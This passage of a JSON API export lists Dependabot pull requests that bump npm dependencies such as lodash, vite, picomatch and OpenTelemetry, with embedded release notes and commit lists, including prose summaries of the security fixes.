details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e\u003ca href=\"https://github.com/vitejs/vite/compare/v7.3.1...v7.3.2\"\u003e7.3.2\u003c/a\u003e (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eavoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e09d8c90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebackport \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22162\"\u003e#22162\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e19db0f2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22160\"\u003e#22160\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003ef8103cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cc383e07b66d4c5a9768fcb570e0af812cb8d999\"\u003e\u003ccode\u003ecc383e0\u003c/code\u003e\u003c/a\u003e release: v7.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e\u003ccode\u003e09d8c90\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003e\u003ccode\u003ef8103cc\u003c/code\u003e\u003c/a\u003e fix: check \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22160\"\u003e#22160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e\u003ccode\u003e19db0f2\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22162\"\u003e#22162\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/vitejs/vite/commits/v7.3.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca hre...\n\n_Description has been truncated_","html_url":"https://github.com/HarleyCoops/accountability/pull/3","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/HarleyCoops%2Faccountability/issues/3","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/3/packages"},{"uuid":"4529108448","node_id":"PR_kwDOOinlVM7fp_ES","number":32,"state":"closed","title":"Bump the npm_and_yarn group across 5 directories with 25 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-29T00:20:54.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-27T02:58:31.000Z","updated_at":"2026-05-29T00:20:56.000Z","time_to_close":163343,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":25,"packages":[{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"@opentelemetry/sdk-node","old_version":"0.41.2","new_version":"0.218.0","repository_url":"https://github.com/open-telemetry/opentelemetry-js"},{"name":"aws-sdk","old_version":"2.1358.0","new_version":"2.1693.0","repository_url":"https://github.com/aws/aws-sdk-js"},{"name":"ajv","old_version":"6.12.6","new_version":"6.14.0","repository_url":"https://github.com/ajv-validator/ajv"},{"name":"@node-oauth/oauth2-server","old_version":"5.1.0","new_version":"5.3.0","repository_url":"https://github.com/node-oauth/node-oauth2-server"},{"name":"@node-saml/passport-saml","old_version":"4.0.4","new_version":"5.1.0","repository_url":"https://github.com/node-saml/passport-saml"},{"name":"@xmldom/xmldom","old_version":"0.7.13","new_version":"0.8.13","repository_url":"https://github.com/xmldom/xmldom"},{"name":"i18next-fs-backend","old_version":"2.3.1","new_version":"2.6.4","repository_url":"https://github.com/i18next/i18next-fs-backend"},{"name":"i18next-http-middleware","old_version":"3.5.0","new_version":"3.9.3","repository_url":"https://github.com/i18next/i18next-http-middleware"},{"name":"mongoose","old_version":"8.9.5","new_version":"8.22.1","repository_url":"https://github.com/Automattic/mongoose"},{"name":"nodemailer","old_version":"6.9.9","new_version":"8.0.5","repository_url":"https://github.com/nodemailer/nodemailer"},{"name":"dompurify","old_version":"3.2.4","new_version":"3.4.0","repository_url":"https://github.com/cure53/DOMPurify"},{"name":"postcss","old_version":"8.5.3","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"uuid","old_version":"9.0.1","new_version":"14.0.0","repository_url":"https://github.com/uuidjs/uuid"},{"name":"webpack-dev-server","old_version":"5.2.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"tmp","old_version":"0.2.3","new_version":"0.2.6","repository_url":"https://github.com/raszi/node-tmp"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.25.9","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@tootallnate/once","old_version":"2.0.0","new_version":"2.0.1","repository_url":"https://github.com/TooTallNate/once"},{"name":"axios","old_version":"1.8.4","new_version":"1.16.1","repository_url":"https://github.com/axios/axios"},{"name":"fast-uri","old_version":"3.0.1","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"path-to-regexp","old_version":"0.1.12","new_version":"0.1.13","repository_url":"https://github.com/pillarjs/path-to-regexp"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 22 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [@opentelemetry/sdk-node](https://github.com/open-telemetry/opentelemetry-js) | `0.41.2` | `0.218.0` |\n| [aws-sdk](https://github.com/aws/aws-sdk-js) | `2.1358.0` | `2.1693.0` |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [@node-oauth/oauth2-server](https://github.com/node-oauth/node-oauth2-server) | `5.1.0` | `5.3.0` |\n| [@node-saml/passport-saml](https://github.com/node-saml/passport-saml) | `4.0.4` | `5.1.0` |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.7.13` | `0.8.13` |\n| [i18next-fs-backend](https://github.com/i18next/i18next-fs-backend) | `2.3.1` | `2.6.4` |\n| [i18next-http-middleware](https://github.com/i18next/i18next-http-middleware) | `3.5.0` | `3.9.3` |\n| [mongoose](https://github.com/Automattic/mongoose) | `8.9.5` | `8.22.1` |\n| [nodemailer](https://github.com/nodemailer/nodemailer) | `6.9.9` | `8.0.5` |\n| [dompurify](https://github.com/cure53/DOMPurify) | `3.2.4` | `3.4.0` |\n| [postcss](https://github.com/postcss/postcss) | `8.5.3` | `8.5.10` |\n| [uuid](https://github.com/uuidjs/uuid) | `9.0.1` | `14.0.0` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.1` | `5.2.4` |\n| [tmp](https://github.com/raszi/node-tmp) | `0.2.3` | `0.2.6` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.25.9` | `7.29.7` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `2.0.0` | `2.0.1` |\n| [axios](https://github.com/axios/axios) | `1.8.4` | `1.16.1` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.0.1` | `3.1.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `0.1.12` | `0.1.13` |\n\nBumps the npm_and_yarn group with 1 update in the /libraries/metrics directory: [@opentelemetry/sdk-node](https://github.com/open-telemetry/opentelemetry-js).\nBumps the npm_and_yarn group with 4 updates in the /server-ce/test directory: [uuid](https://github.com/uuidjs/uuid), [js-yaml](https://github.com/nodeca/js-yaml), [path-to-regexp](https://github.com/pillarjs/path-to-regexp) and [sha.js](https://github.com/crypto-browserify/sha.js).\nBumps the npm_and_yarn group with 5 updates in the /services/web directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@node-saml/passport-saml](https://github.com/node-saml/passport-saml) | `4.0.4` | `5.1.0` |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.7.13` | `0.9.10` |\n| [mongoose](https://github.com/Automattic/mongoose) | `8.9.5` | `8.22.1` |\n| [nodemailer](https://github.com/nodemailer/nodemailer) | `6.10.1` | `8.0.9` |\n| [uuid](https://github.com/uuidjs/uuid) | `9.0.1` | `14.0.0` |\n\nBumps the npm_and_yarn group with 3 updates in the /services/web/scripts/translations directory: [lodash](https://github.com/lodash/lodash), [ajv](https://github.com/ajv-validator/ajv) and [postcss](https://github.com/postcss/postcss).\n\nUpdates `lodash` from 4.17.21 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.21...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@opentelemetry/sdk-node` from 0.41.2 to 0.218.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/releases\"\u003e@​opentelemetry/sdk-node's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eexperimental/v0.218.0\u003c/h2\u003e\n\u003ch2\u003e0.218.0\u003c/h2\u003e\n\u003ch3\u003e:rocket: Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(otlp-transformer): replace protobufjs metrics serialization with custom implementation \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6629\"\u003e#6625\u003c/a\u003e \u003ca href=\"https://github.com/pichlermarc\"\u003e\u003ccode\u003e@​pichlermarc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(configuration): show all config validation errors, if there are multiple \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6683\"\u003e#6683\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(sdk-node): allow startNodeSDK() without an arg \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6688\"\u003e#6688\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e:house: Internal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(sdk-logs): alias \u003ccode\u003eLoggerProviderConfig\u003c/code\u003e to \u003ccode\u003eLoggerProviderOptions\u003c/code\u003e \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6691\"\u003e#6691\u003c/a\u003e \u003ca href=\"https://github.com/david-luna\"\u003e\u003ccode\u003e@​david-luna\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor(sdk-logs): use \u003ccode\u003eLogger.enabled()\u003c/code\u003e within 